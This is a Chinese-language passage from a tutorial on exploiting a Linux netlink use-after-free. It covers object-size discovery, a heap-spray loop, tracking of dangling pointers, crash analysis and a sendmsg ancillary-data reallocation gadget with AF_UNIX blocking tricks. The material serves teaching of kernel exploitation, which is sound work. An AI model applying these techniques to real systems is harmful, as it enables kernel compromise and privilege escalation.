到现在为止，我们知道在整一个协议注册的过程中，netlink家族注册了一个struct net_proto_family即是netlink_family_ops。这个结构式相当直接的（创造回调）：

struct net_proto_family {int     family;int     (*create)(struct net *net, struct socket *sock,int protocol, int kern);struct module   *owner;
};

static struct net_proto_family netlink_family_ops = {.family = PF_NETLINK,.create = netlink_create,               // <-----.owner  = THIS_MODULE,
};

当netlink_create()被调用之后，一个struct socket就已经被申请了。他的目的是去分配struct netlink_sock，并且将他和socket链接起来和初始化 struct socket和struct netlink_sock字段。这也是他进行套接字类型（RAW原始套接字, DGRAM数据包式套接字）和netlink的协议标识符（NETLINK_USERSOCK, …）安全检查的地方。

static int netlink_create(struct net *net, struct socket *sock, int protocol,int kern)
{struct module *module = NULL;struct mutex *cb_mutex;struct netlink_sock *nlk;int err = 0;sock->state = SS_UNCONNECTED;if (sock->type != SOCK_RAW && sock->type != SOCK_DGRAM)return -ESOCKTNOSUPPORT;if (protocol < 0 || protocol >= MAX_LINKS)return -EPROTONOSUPPORT;// ... cut (load the module if protocol is not registered yet - lazy loading) ...err = __netlink_create(net, sock, cb_mutex, protocol, kern);    // <-----if (err < 0)goto out_module;// ... cut...
}

依次下去，__netlink_create()是struct netlink_sock创建的关键。

      static int __netlink_create(struct net *net, struct socket *sock,struct mutex *cb_mutex, int protocol, int kern){struct sock *sk;struct netlink_sock *nlk;[0]     sock->ops = &netlink_ops;[1]     sk = sk_alloc(net, PF_NETLINK, GFP_KERNEL, &netlink_proto);if (!sk)return -ENOMEM;[2]     sock_init_data(sock, sk);// ... cut (mutex stuff) ...[3]     init_waitqueue_head(&nlk->wait);[4]     sk->sk_destruct = netlink_sock_destruct;sk->sk_protocol = protocol;return 0;}

__netlink_create()函数：
[0]设置socket的proto_ops 虚函数表为netlink_ops
[1]用prot->slab和prot->obj_size的信息申请了一个netlink_sock
[2]初始化sock的发送和接收缓冲区，初始化sk_rcvbuf/sk_sndbuf变量，绑定socket和sock。
[3]初始化等待队列
[4]定义一个专门的析构函数在释放struct netlink_sock的时候会被调用。

最后，sk_alloc()实际是调用 sk_prot_alloc() （通过使用 struct proto即netlink_proto）。这儿就是内核使用专门或者通用的cache进行分配的地方。

static struct sock *sk_prot_alloc(struct proto *prot, gfp_t priority,int family)
{struct sock *sk;struct kmem_cache *slab;slab = prot->slab;if (slab != NULL) {sk = kmem_cache_alloc(slab, priority & ~__GFP_ZERO);      // <-----// ... cut (zeroing the freshly allocated object) ...}elsesk = kmalloc(sk_alloc_size(prot->obj_size), priority);    // <-----// ... cut ...return sk;
}

在我们看来整个协议绑定的过程中，他没有使用任何slab（slab是空的），所以他将会调用kmalloc()函数（通用cache）。

最后，我么需要整理出一个netlink_create()的调用路径。让人惊奇的是，进入的地方是socket()的syscall，我们不会展开所有路径（这是一个很好的练习）。这儿是结果：

- SYSCALL(socket)
- sock_create
- __sock_create // allocates a "struct socket"
- pf->create    // pf == netlink_family_ops
- netlink_create
- __netlink_create
- sk_alloc
- sk_prot_alloc
- kmalloc

好的，我么知道netlink_sock 是在哪里被分配的和kmem_cache 的类型是通用kmem_cache ，但是我们仍然不知道确切的kmem_cache （kmalloc-32? kmalloc-64?）。

3-6 静态和动态检测对象大小

上一节中，我们知道了netlink_sock对象是被一个通用kmem_cache分配的

kmalloc(sk_alloc_size(prot->obj_size), priority)
\\kmalloc(大小,类型)

sk_alloc_size()在哪：

#define SOCK_EXTENDED_SIZE ALIGN(sizeof(struct sock_extended), sizeof(long))static inline unsigned int sk_alloc_size(unsigned int prot_sock_size)
{return ALIGN(prot_sock_size, sizeof(long)) + SOCK_EXTENDED_SIZE;
}

NOTE：struct sock_extended结构体是用于在不破坏内核的ABI的情况下扩展原本的struct sock。这个不是一定要去了解的，我们只是需要明白他的大小是被预先申请的。

就是说大小是：sizeof(struct netlink_sock) + sizeof(struct sock_extended) + SOME_ALIGNMENT_BYTES.

记住我们不是一定要知道确切的大小。既然我们分配到一个通用的
kmem_cache，我们只需要知道cache的上界即最大值足够容纳我们的对象（见核心概念）。

WARNING-1：在核心概念中提到通用的kmemcaches有2的次方的大小。这不一定是完全准确的。有些操作系统有其他大小像 “kmalloc-96” 和 “kmalloc-192”。这样做的理由是有很多对象是更接近这些大小，而不是2的次方，这么做可以减少内碎片。

WARNING-2：使用“仅调试”的方法是一个好的开始点去大致了解目标对象的大小。无论怎么样，这些大小可能是错的在生产内核上的预处理配置文件不同。他会变化一些字节甚至几百字节。同时，我们应该在我们计算出来的内核和kmem_cache大小边界相近的时候特别关注。举个例子，一个260字节的对象可以在kmalloc-512但是可能被减少到220字节在生产内核上（对于kmalloc-256，那将会很困难）。

ps：
standard(production) kernel：生产内核就是指我们正在使用的kernel。
Crash(capture)kernel：捕获内核，linux系统崩溃后使用的内核。

用下面的方法5（看下面），我们发现我们的目标大小是kmalloc-1024，这是一个完美的cache去实现UAF,你会在再分配字节看到的。

Method #1 [static]: 手算
这个注意是纯手工去加所有的字段大小（例如long是8字节，int是4字节）。这个方法在小的结构上效果很好，但是在打的结构上很容易出错。必须考虑对齐，填充，打包（减少数据结构中的数据结构）。例如：

struct __wait_queue {unsigned int flags;           // offset=0, total_size=4// offset=4, total_size=8 <---- PADDING HERE TO ALIGN ON 8 BYTESvoid *private;                // offset=8, total_size=16wait_queue_func_t func;       // offset=16, total_size=24struct list_head task_list;   // offset=24, total_size=40 (sizeof(list_head)==16)
};

这个很简单，但是可以看看struct sock，祝你好运。这个甚至更容易出错，当需要考虑每一个预处理程序配置的宏和控制复杂的union。

Method #2 [static]: 用 ‘pahole’ 工具 (debug only)
pahole是一个很好的工具去实现这个，他自动的做做这个冗长的先置任务。举个例子，把struct socket的结构dump下来：

$ pahole -C socket vmlinuz_dwarf
struct socket {socket_state               state;                /*     0     4 */short int                  type;                 /*     4     2 *//* XXX 2 bytes hole, try to pack */long unsigned int          flags;                /*     8     8 */struct socket_wq *         wq;                   /*    16     8 */struct file *              file;                 /*    24     8 */struct sock *              sk;                   /*    32     8 */const struct proto_ops  *  ops;                  /*    40     8 *//* size: 48, cachelines: 1, members: 7 *//* sum members: 46, holes: 1, sum holes: 2 *//* last cacheline: 48 bytes */
};

这看起来是一个完美的工具，但是他需要内核有 DWARF标志。然而开发内核是没有这个的。

Method #3 [static]: 用反编译器
好的，你不能确切的得到一个合适的kmalloc()大小是因为他是动态的。无论怎样，你可能需要尽量的去查看这些结构所用偏移地址（特别是最后一个字段）然后手工计算，我们之后会确切的使用。

Method #4 [dynamic]: 用 System Tap 工具 (debug only)
在第一部分我们展示了如何使用Sytem Tap的Guru模式去写一些代码嵌入内核中（LKM）。我们可以重新使用他在这儿，仅仅重新查看sk_alloc_size()函数的过程。注意你不一定能直接调用sk_alloc_size()因为他是内联函数。无论怎么样，你能复制粘贴他的代码然后dump下来。

另一种方法可以在socket()调用期间探测kmalloc()的调用。机会可能翻倍，那么怎么去知道哪个是正确的呢？你可以close()这个你刚刚创建的socket，探测kfree()然后尽力去匹配在kmalloc()中的指针。因为kmalloc的第一个参数是大小，所以你可以找到正确的一个。

作为一种选择，你可以使用来自kmalloc()的print_backtrace()函数。当心，System Tap会抛弃一些信息，如果内容太多的话。

Method #5 [dynamic]: 查看 "/proc/slabinfo"
这个方法看起来和low，但是其实效果很好。如果kmem_cache使用一个专用的cache，那么你直接有这个对象的大小在“objsize”列，只需要知道你的kmem_cache的名字（struct proto）
要不然，就写一个需要分配大量目标对象的程序。例如：

int main(void)
{while (1){// allocate by chunks of 200 objectsfor (int i = 0; i < 200; ++i)_socket(AF_NETLINK, SOCK_DGRAM, NETLINK_USERSOCK);getchar();}return 0;
}

NOTE：我们在这儿做的实际上是堆喷射（heap spraying）。
在另一个窗口跑：

watch -n 0.1 'sudo cat /proc/slabinfo | egrep "kmalloc-|size-" | grep -vi dma'

然后运行程序，输入一个键来触发下一个块的划分。在一些时间后，你会看到一个通用cache"active_objs/num_objs"越来越多，这个就是我们的目标kmem_cache

3-7 总结：

好了，收集全部的信息花了很久。无论怎么样，他是必要的，而且让我们更好的了解到了网络协议API。我希望你现在知道为什么
KASAN是让人惊叹的，他做的所有这些工作甚至更多。

让我们来总结一下：
分配器是什么？
SLAB
对象是什么？
struct netlink_sock
他属于哪一个cache？
kmalloc-1024
他是怎么申请的？

SYSCALL(socket)
sock_create
__sock_create // allocates a “struct socket”
pf->create // pf == netlink_family_ops
netlink_create
__netlink_create
sk_alloc
sk_prot_alloc
kmalloc

他是怎么释放的？

<<< what ever calls sock_put() on a netlink_sock (e.g. netlink_detachskb()) >>>
sock_put
sk_free
__sk_free
sk_prot_free
kfree
这儿还有最后一件事情需要分析，这就是如何（读/写？恶意返回参数？多少大小？）。这些会在下面的章节被讲到。

4.分析UAF（悬空指针）

我们回到bug

在这节中，我们会找到UAF的悬空指针，为什么part2部分的验证代码crash了，为什么我们以及做的“UAF迁移”(不是一个官方的称呼）是对我们有利的。

4-1 寻找悬空指针

现在，内核还没有机会在界面反馈错误就残忍的崩溃了。所以，我们没有任何调用跟踪区了解他是这么进行的。唯一确认的事是我们每次打中他的关键点，他就崩溃了，从前也没有过。当然，这个是有意的。我们实际上已经做了一个UAF转移。来解释以下：

整个exploit初始化时，我们做了：

创造一个netlink socket
对他进行约束
填充他的接收缓冲区
重复两次触发漏洞

这是，我们现在的工作情况：

file cnt  | sock cnt  | fdt[3]    | fdt[4]    | fdt[5]    | file_ptr->private_data | socket_ptr->sk |
----------+-----------+-----------+-----------+-----------+------------------------+----------------+
3         | 2         | file_ptr  | file_ptr  | file_ptr  | socket_ptr             | sock_ptr       |注意，这里面的fdt[4]和fdt[5]应该都是dup()出来的
fdt[3]=sock_fd，fdt[4]=unblock_fd，fdt[5]=sock_fd2

注意socket_ptr （struct socket）和sock_ptr（struct netlink_sock）的不同。

我们假设：

fd=3 is "sock_fd"
fd=4 is "unblock_fd"
fd=5 is "sock_fd2"

struct file与我们的netlink socket相关的计数器是3，因为一个是socket()的，两个是dup()的。反过来，sock的计数器是2，因为一个是socket()用，一个是bind()用。

现在，让我们来触发这个漏洞一次，这个sock计数器将会减一，文件计数器也会减一。而且fdt[5]变成null了，注意调用close(5)没有sock计数器减一，使这个漏洞做的。

现在的情况：

file cnt  | sock cnt  | fdt[3]    | fdt[4]    | fdt[5]    | file_ptr->private_data | socket_ptr->sk |
----------+-----------+-----------+-----------+-----------+------------------------+----------------+
2         | 1         | file_ptr  | file_ptr  | NULL      | socket_ptr             | sock_ptr       |

触发第二次：

file cnt  | sock cnt  | fdt[3]    | fdt[4]    | fdt[5]    | file_ptr->private_data | socket_ptr->sk      |
----------+-----------+-----------+-----------+-----------+------------------------+---------------------+
1         | FREE      | NULL      | file_ptr  | NULL      | socket_ptr             | (DANGLING) sock_ptr |

同样的，这里close(3)没有让sock的计数器减一，是这个漏洞做的。因为这个计数器变成了0，所以才被释放的。

正如我们所看见的，这个struct file仍然或者因为第四个文件指针指向他。并且，这个struct socket现在又一个悬空指针在各个释放的sock对象上。这个减少上面提到的UAF迁移。不像第一个情景，sock变量是一个悬空指针，现在是struct socket结构体中sk指针。换种方式说，我们现在可以通过还活着的unblock_fd来访问socket的悬空指针。

你可能想知道为什么struct socket仍然又一个悬空指针？原因是，当netlink_sock 对象被用__sk_free()释放之后，他做了：
1.调用sock的析构函数
2.调用sk_prot_free()

没有一个实际上更新了socket的结构体。

如果你在利用漏洞的时候在最后按下一个键之前看来命令行界面，你会发现一个信息：

[  141.771253] Freeing alive netlink socket ffff88001ab88000

这个来自sock的析构函数netlink_sock_destruct() (__sk_free()调用的)：

static void netlink_sock_destruct(struct sock *sk)
{struct netlink_sock *nlk = nlk_sk(sk);// ... cut ...if (!sock_flag(sk, SOCK_DEAD)) {printk(KERN_ERR "Freeing alive netlink socket %p\n", sk); // <-----return;}// ... cut ...
}

好了，我们现在找到了一个悬空指针，你猜猜看怎么样，还有更多。

当我们用netlink_bind()创建目标socket的时候，我们看到计数器被增加了一。那就是为什么我们会可以用netlink_getsockbypid()来引用他。没有太多的细节，netlink_sock指针被存在nl_table的哈希表中（这会在第四部分被讲到）。当销毁一个sock对象，这些指针也变成了悬空指针。

去找到所有的悬空指针又以下两点原因：

我们可以用他们去使用UAF，他们是基础。
我们需要在修复内核的时候修复他们。

让我们据徐去理解为什么内核会crash在退出的时候。

4-2 了解crash：

在上面的文章中我们发现了三个悬空指针：
在struct socket中的sk（sk被释放了，但是struct socket没有被释放，其中的第一个字段指向sk，所以就变成了悬空指针）
两个netlink_sock指针在nl_table的哈希表中（有三个netlink_sock指向一个sk，一个被释放了，其他两个就是悬空指针）

现在是时候去解释为什么poc会crash。

我们输入一个字符的在我们的验证代码时发生了什么？这个exp仅仅是退出了，到那时这个意味着很多。内核需要去释放每一个分配给程序的资源。不然会又大量的内存泄露。

这个退出的过程本身时有一点复杂的。他多半时发生在do_exit()函数。在一些时候，他需要去释放文件相关的指针。他大概做了这些：

请求调用do_exit()（[kernel/exit.c]）
调用exit_files()，这个函数是通过put_files_struct()去释放当前的 struct files_struct 引用。
因为着是最后的引用，put_files_struct() 调用close_files()。
close_files()循环访问FDT表，为每一个剩余的文件调用filp_close()。
filp_close()调用fputs()在unblock_fd的文件指针上。
因为他是最后一个引用，所以_fput()启动了。
最后，_fputs()调用文件操作 file->f_op->release()，实际上就是sock_close()。
sock_close()调用sock->ops->release()(proto_ops: netlink_release())和设置sock->file为null
在netlink_release()时，有很多UAF操作最后导致crash。

为了保持简单，我们没有把unblock_fd释放，而是让他在程序退出的时候自动释放。在最后，netlink_release()将会被调用。从这里开始，这儿有很多UAF,如果他不crash就太幸运了：

static int netlink_release(struct socket *sock)
{struct sock *sk = sock->sk;         // <----- dangling pointerstruct netlink_sock *nlk;if (!sk)                            // <----- not NULL because... dangling pointerreturn 0;netlink_remove(sk);                 // <----- UAFsock_orphan(sk);                    // <----- UAFnlk = nlk_sk(sk);                   // <----- UAF// ... cut (more and more UAF) ...
}

哇。。。这儿有很多UAF操作，对不？他事实上太多了:-(。。。问题是，每一个操作都必须如此：
1.做一些有用的事或者什么都不做
2.不会crash（因为bug）或者坏的返回参数

因为这个，netlink_release()不是一个好的选择，对于exp来说（看下一节）。

在进一步之前，让我们确认让程序crash的真正原因通过修改poc和运行他：

int main(void)
{// ... cut ...printf("[ ] ready to crash?\n");PRESS_KEY();close(unblock_fd);printf("[ ] are we still alive ?\n");PRESS_KEY();
}

很好，我们没有看见"[ ] are we still alive?"的信息。我们的直觉是对的，内核crash是因为netlink_release()的UAF们。这也代表其他很重要的事：我们有一个我们想要就可以触发UAF的方法。

现在我们发先了悬空指针，了解为什么内核crash，了解我们可以无论何时的触发UAF，现在是时候去写exp了。

5.利用（重新分配）

“这不是演习”

独立于bug，一个UAF的exp需要一个再分配在一些指针上。为了去做他，一个reallocation gadget 是必要的。

一个reallocation gadget意味着强迫内核在用户空间（一般是通过syscall()）使用kmalloc()（内核代码路径）。一个完美的reallocation gadget有以下的特性：

快：在到达kmalloc()之前没有复杂的路径。
数据控制：填充任意数据在kmalloc()分配的空间里。
没有阻塞：这个gadget不会阻塞线程。
灵活的：kmalloc的size参数可控。

不幸的是，极少能发现一个简单的gadget可以做上面的所有的。一个著名的gadget是msgsnd() （System V IPC，系统5进程间通信）。他是快的，他也不阻塞，你达到一些通用的kmem_cache 从64的大小开始。哎，他无法控制前48位的数据（sizeof(struct msg_msg)）。我们不将会使用他在这儿，如果你对这个gadget好奇，可以看看sysv_msg_load()。

这节会介绍另一个知名的gadget：ancillary data buffer（也被叫做sendmsg()）。然后他将会揭示你exp失败的主要原因和怎么去最小化风险。总结本节，我们将会看到怎么样在用户空间使用再分配。

5-1 再分配简介（SLAB）

为了用类型混淆写UAF的exp，我们需要去申请一个精心安排的对象在老的struct netlink_sock里面。让我们想一想这个对象是在：0xffffffc0aabbcced。我们无法去改变位置。

“如果你不能去找他们，就让他们来找你”

在特定的位置分配对象叫做重定位。往往这个内存地址和你刚刚释放的内存是相同的。（我们例子中的struct netlink_sock）

通过SLAB分配器，这是很简单的。为什么？通过struct array_cache的帮助，SLAB使用LIFO算法。这就表明，最后释放的内存地址 (kmalloc-1024)和第一个重新投入使用的地址是相同的。
这是非常震惊的，因为他和slab无关。如果你尝试使用SLUB重新分配的话，就不会是这样的了。

让我们描述一下 kmalloc-1024的cache：
1.每个kmalloc-1024的对象有1024字节的大小。
2.每个slab是由一个简单的页面组测（4096字节），因此每一个slab里面由4个对象。
3.现在让我们假设这个cache有两个slab。

在释放 struct netlink_sock 对象之前，我们在这个情况：

注意ac->available是指向下一个未分配的空对象的编号（plus one）。netlink_sock 对象是被释放的。在最快的方法中，释放一个对象等同于：

ac->entry[ac->avail++] = objp;  // "ac->avail" is POST-incremented

他导致了这个情况：

最后，一个struct sock对象被分配(kmalloc(1024))通过最快路径。

objp = ac->entry[--ac->avail];  // "ac->avail" is PRE-decremented

导致了下面的情况：

这就是了。新struct sock的内存地址是和老的struct netlink_sock (0xffffffc0aabbccdd)一样的。我们做了一个重分配。不是很差，对吧？

当然，这个是理想的例子。在实际中，多件事可能出错就像我们接下来做的一样。

5-2 重定位gadget

先前的文章介绍了两个socket缓冲区：发送缓冲区和接收缓冲区。这儿其实有第三个：选择缓冲区（也被叫做辅助数据缓冲区）。在这一节，我们将会看到怎么样用任意数据填充他并且把他作为我们的在分配gadget。

这个gadget是可以被上面所说的sendmsg()的系统调用访问到。函数__sys_sendmsg()是（几乎）直接被SYSCALL_DEFINE3(sendmsg)调用：

      static int __sys_sendmsg(struct socket *sock, struct msghdr __user *msg,struct msghdr *msg_sys, unsigned flags,struct used_address *used_address){struct compat_msghdr __user *msg_compat =(struct compat_msghdr __user *)msg;struct sockaddr_storage address;struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
[0]     unsigned char ctl[sizeof(struct cmsghdr) + 20]__attribute__ ((aligned(sizeof(__kernel_size_t))));/* 20 is size of ipv6_pktinfo */unsigned char *ctl_buf = ctl;int err, ctl_len, iov_size, total_len;// ... cut (copy msghdr/iovecs + sanity checks) ...[1]     if (msg_sys->msg_controllen > INT_MAX)goto out_freeiov;
[2]     ctl_len = msg_sys->msg_controllen;if ((MSG_CMSG_COMPAT & flags) && ctl_len) {// ... cut ...} else if (ctl_len) {if (ctl_len > sizeof(ctl)) {[3]         ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);if (ctl_buf == NULL)goto out_freeiov;}err = -EFAULT;[4]       if (copy_from_user(ctl_buf, (void __user *)msg_sys->msg_control,ctl_len))goto out_freectl;msg_sys->msg_control = ctl_buf;}// ... cut ...[5]     err = sock_sendmsg(sock, msg_sys, total_len);// ... cut ...out_freectl:if (ctl_buf != ctl)
[6]       sock_kfree_s(sock->sk, ctl_buf, ctl_len);out_freeiov:if (iov != iovstack)sock_kfree_s(sock->sk, iov, iov_size);out:return err;}

他做了：
[0]：申明一个ctl的缓冲区大小是（16+20）字节在栈中
[1]：确保用户空间的msg_controllen是小于等于INT_MAX
[2]：把用户空间的msg_controllen 拷贝到ctl_len
[3]：用kmalloc()分配一个大小为ctl_len内核缓冲区ctf_buf
[4]：把ctl_len大小的msg_control 中的用户数据拷贝到内核缓冲区ctl_buf （在[3]中申请的）
[5]：调用sock_sendmsg()，这个函数会调用一个socket的回调sock->ops->sendmsg()
[6]：释放内核缓冲区ctl_buf

ps：具体的cmsghdr和msghdr可以参考https://blog.csdn.net/wsllq334/article/details/6977039。msghdr 其中的msg_control（指向缓冲区）与msg_controllen（缓冲区大小）字段就是所谓的附属缓冲区成员。附属信息可以包括0，1，或是更多的单独附属数据对象。在每一个对象之前都有一个struct cmsghdr结构。头部之后是填充字节，然后是对象本身。简单的说，就是struct msghdr是整个sendmsg的头，cmsghdr是辅助缓冲区
的头

大量的用户空间数据，对不？对，那就是为什么我们喜欢他。总之，我们可以申请一块内核缓冲区通过

kmalloc()：
msg->msg_controllen：任意大小（必须比36字节大，但是小于INT_MAX）
msg->msg_control：任意数据

现在。让我们来看看sock_kmalloc()做了什么：

      void *sock_kmalloc(struct sock *sk, int size, gfp_t priority){[0]     if ((unsigned)size <= sysctl_optmem_max &&atomic_read(&sk->sk_omem_alloc) + size < sysctl_optmem_max) {void *mem;/* First do the add, to avoid the race if kmalloc* might sleep.*/
[1]       atomic_add(size, &sk->sk_omem_alloc);
[2]       mem = kmalloc(size, priority);if (mem)
[3]         return mem;atomic_sub(size, &sk->sk_omem_alloc);}return NULL;}

首先，这个大小的参数是会被再次检查，与内核范围“optmem_max”比较。他能被在procfs文件系统里面检索：

$ cat /proc/sys/net/core/optmem_max

如果这个size是小于sysctl_optmem_max ，那么会将size和当前sock的当前可选择内存缓冲区大小相加并且检查他是否小于sysctl_optmem_max（optmem_max）[0]。我们将会需要区检查这个在exp中。记住，我们的目标kmem_cache是kmalloc-1024。如果这个optmem_max的大小是小于或者等于512字节的，那么我们搞砸了。在例子中，我们应该找到另一个重定向gadget。sk_omem_alloc 已经在sock创造时被初始化为0了。

NOTE：记住kmalloc(512 + 1)就会在kmalloc-1024的cache里了。

如果检查0通过了，那么sk_omem_alloc 会被增加size的大小[1]。然后，这儿时一个kmalloc()的调用，使用的时size参数。如果他成功了，这个指针会被返回[3]，否则sk_omem_alloc会减去size然后函数会返回null。

好了，我们可以调用kmalloc()申请几乎任意大小的空间（[36,sysctl_optmem_max]），他内容会被任意值填充。虽然有问题。ctl_buf缓冲区会被自动的释放当__sys_sendmsg()退出的时候（[6]在之前的函数里）。即，sock_sendmsg()的调用必须被中止。（sock->ops->sendmsg()）

5-3 阻止sendmsg()

在过去的文章里，我们知道怎么让一个sendmsg()被中止：填满整个接收缓冲区。这个可能会诱惑我们去做和netlink_sendmsg()一样的事。不幸的是，我们不能重用这个方法。原因是netlink_sendmsg()将会调用netlink_unicast()，netlink_unicast()会调用netlink_getsockbypid()。如此一来，将会让我们在nl_table的哈希表悬空指针被取消（UAF）。

即，我们必须找到另一个socket家族：AF_UNIX。你可以使用另一个，但是这个是很棒，因为他不需要任何特殊权限而且几乎无处不在。

ps：AF_UNIX见：https://www.cnblogs.com/shangerzhong/p/9153737.html

WARNING：我们不将会介绍AF_UNIX的实现（特别是unix_dgram_sendmsg()），那会很长。他不是那么复杂（和AF_NETLINK很相近），我们只需要知道两件事：

申请任意数据在“选择的”缓冲区（最后一节）
让unix_dgram_sendmsg()调用中止

像netlink_unicast()，一个sendmsg会被以下条件中止：

接收缓冲区是满的
发生socket的timeout值被设置为MAX_SCHEDULE_TIMEOUT

在unix_dgram_sendmsg()（像netlink_unicast()），这个timeo的值是被计算的：

timeo = sock_sndtimeo(sk, msg->msg_flags & MSG_DONTWAIT);static inline long sock_sndtimeo(const struct sock *sk, int noblock)
{return noblock ? 0 : sk->sk_sndtimeo;
}

即，如果我们不设置noblock参数（不使用MSG_DONTWAIT），那么timeout的值是sk_sndtimeo。幸运的是，这个值可以通过setsockopt()控制：

int sock_setsockopt(struct socket *sock, int level, int optname,char __user *optval, unsigned int optlen)
{struct sock *sk = sock->sk;// ... cut ...case SO_SNDTIMEO:ret = sock_set_timeout(&sk->sk_sndtimeo, optval, optlen);break;// ... cut ...
}

他调用了sock_set_timeout()：

static int sock_set_timeout(long *timeo_p, char __user *optval, int optlen)
{struct timeval tv;if (optlen < sizeof(tv))return -EINVAL;if (copy_from_user(&tv, optval, sizeof(tv)))return -EFAULT;if (tv.tv_usec < 0 || tv.tv_usec >= USEC_PER_SEC)return -EDOM;if (tv.tv_sec < 0) {// ... cut ...}*timeo_p = MAX_SCHEDULE_TIMEOUT;          // <-----if (tv.tv_sec == 0 && tv.tv_usec == 0)    // <-----return 0;                             // <-----// ... cut ...
}

在最后，如果我们调用setsockopt()通过选择SO_SNDTIMEO，然后给他一个被填充为0的struct timeval 。他将会设置timeout的值为MAX_SCHEDULE_TIMEOUT（无限阻塞）。他不要求任何特殊的权限。

我们的问题解决了。

第二个问题是我们需要处理控制数据缓冲区的代码。他很容易在unix_dgram_sendmsg()被调用。

static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock,struct msghdr *msg, size_t len)
{struct sock_iocb *siocb = kiocb_to_siocb(kiocb);struct sock *sk = sock->sk;// ... cut (lots of declaration) ...if (NULL == siocb->scm)siocb->scm = &tmp_scm;wait_for_unix_gc();err = scm_send(sock, msg, siocb->scm, false);     // <----- hereif (err < 0)return err;// ... cut ...
}

我们虽然在上一篇文章绕过了检查，但是这儿依然有一些不同的事情：

static __inline__ int scm_send(struct socket *sock, struct msghdr *msg,struct scm_cookie *scm, bool forcecreds)
{memset(scm, 0, sizeof(*scm));if (forcecreds)scm_set_cred(scm, task_tgid(current), current_cred());unix_get_peersec_dgram(sock, scm);if (msg->msg_controllen <= 0)         // <----- this is NOT true anymorereturn 0;return __scm_send(sock, msg, scm);
}

正如你所看到的，我们使用过msg_control （所以msg_controllen 是被确定了的）。即我们再也不能绕过 __scm_send()，他需要返回0。

让我们从”辅助数据信息对象“的结构看起：

struct cmsghdr {__kernel_size_t cmsg_len;   /* data byte count, including hdr */int             cmsg_level;   /* originating protocol */int             cmsg_type;    /* protocol-specific type */
};

这是一个16字节的数据结构而且必须在我们的msg_control的缓冲区开始位置（有着任意数据填充）。他的使用事实上取决于socket的类型。我们可以把他们看成，在socket做了一些特殊的事情。举个例子，在UNIX的socket，他可以被用来通过socket传输一些资格凭证。

控制消息缓存（msg_control）能维持一个或多个控制信息。每个控制信息是有头部和数据组成。

第一条控制信息头部可以使用CMSG_FIRSTHDR()检索：

#define CMSG_FIRSTHDR(msg)  __CMSG_FIRSTHDR((msg)->msg_control, (msg)->msg_controllen)#define __CMSG_FIRSTHDR(ctl,len) ((len) >= sizeof(struct cmsghdr) ? \(struct cmsghdr *)(ctl) : \(struct cmsghdr *)NULL)

即，他检查是否在msg_controllen 预计的len是大于16位的。如果不是，意味着控制信息缓冲区甚至没有一个控制信息头。既然这样，他直接返回null。不然，他返回第一个控制信息的开始地址（msg_control）。

为了找到下一个控制信息，必须使用CMG_NXTHDR()去检索下一个控制信息头的开始地址：

#define CMSG_NXTHDR(mhdr, cmsg) cmsg_nxthdr((mhdr), (cmsg))static inline struct cmsghdr * cmsg_nxthdr (struct msghdr *__msg, struct cmsghdr *__cmsg)
{return __cmsg_nxthdr(__msg->msg_control, __msg->msg_controllen, __cmsg);
}static inline struct cmsghdr * __cmsg_nxthdr(void *__ctl, __kernel_size_t __size,struct cmsghdr *__cmsg)
{struct cmsghdr * __ptr;__ptr = (struct cmsghdr*)(((unsigned char *) __cmsg) +  CMSG_ALIGN(__cmsg->cmsg_len));if ((unsigned long)((char*)(__ptr+1) - (char *) __ctl) > __size)return (struct cmsghdr *)0;return __ptr;
}

这个不像他看起来一样复杂。他实际上用现在控制信息的头地址cmsg 加上了当前控制信息头部中的cmsg_len字节（如果必要的话会加一写对齐）。如果下一个头部的总计大小超出了当前整个控制消息缓冲区，那么意味着这儿没有更多头部了，他会返回null。否则，将放回下一个头的指针。

当心！cmsg_len 是他的信息和他的头部的长度和。

最后，这是一个完整性检查宏CMSG_OK()去检查当前的控制信息大小（cmsg_len）是不是大于控制信息缓冲区。

#define CMSG_OK(mhdr, cmsg) ((cmsg)->cmsg_len >= sizeof(struct cmsghdr) && \(cmsg)->cmsg_len <= (unsigned long) \((mhdr)->msg_controllen - \((char *)(cmsg) - (char *)(mhdr)->msg_control)))

好了，现在让我们看看__scm_send()的代码，最后对控制信息做了一些实际有用的事：

      int __scm_send(struct socket *sock, struct msghdr *msg, struct scm_cookie *p){struct cmsghdr *cmsg;int err;[0]     for (cmsg = CMSG_FIRSTHDR(msg); cmsg; cmsg = CMSG_NXTHDR(msg, cmsg)){err = -EINVAL;[1]       if (!CMSG_OK(msg, cmsg))goto error;[2]       if (cmsg->cmsg_level != SOL_SOCKET)continue;// ... cut (skipped code) ...}// ... cut ...[3]     return 0;error:scm_destroy(p);return err;}

我们的目标是去强迫 __scm_send()返回0[3]。因为msg_controllen 是我们再分配的大小（1024）。我们将会进入这个循环[0]（CMSG_FIRSTHDR(msg) != NULL）。

因为[1]，这个值在第一个控制信息头部应该是有效的。我们将会设置他为1024（我们整个控制信息缓冲区的大小）。然后，通过指定一个值不同于SOL_SOCKET 。我们可以跳过整个循环[2]。即，下一个控制信息头部将会被CMSG_NXTHDR()查找，因为cmsg_len 和msg_controllen 是相等的（这是唯一一个控制信息），cmsg将会被设置为null，我们将会成功退出循环，返回0[3]。

用另一句话来说，下列过程：

我们不能控制重新分配缓冲区的前8个字节
我们对cmsg控制头的第二字段有约束，值不能等于1。
头的最后4个字节和其他的1008个字节是可以任意使用的。

好的，我们得到了所有我们需要的东西，去重新分配一个几乎是任意字符填充的kmalloc-1024的cache。在深入研究之前，我们来看看那些可能出错。

5-4 什么可能出错

在重新分配介绍中，理想的情况已经被阐述过了。然而，我们按照那条路攻击会发生什么？事情会出错。。。

WARNING：我们将不会阐述每一个kmalloc()和kfree()的过程，希望你现在已经了解了分配器。

举个例子，让我们思考netlink_sock对象即将要被被释放：

如果array_cache是满的，他会调用cache_flusharray()。这会让批处理释放指针指向每个共享array_cache（如果有的话）然后调用free_block()。即，下一个kmalloc()的最快路径不会是最近释放的对象。打破了LIFO的特性。
如果最后释放的对象是在一个partial slab，他将会被插入到slabs_free 的队列中。
如果cache早已经有了太多的释放对象，释放的slab会被破坏。（页面会被还给伙伴分配系统）
伙伴系统可能会创建一些紧凑的东西（像PCP?）然后开始睡眠。
调度器会让另一个cpu去完成你的任务。array_cache 就会是per-cpu。（per-cpu为系统中的每个处理器都分配了共享变量的副本，详细：https://blog.csdn.net/longwang155069/article/details/52033243）
系统的内存不足（不是因为你），尽量的去回内存从每一个子系统和分配器。

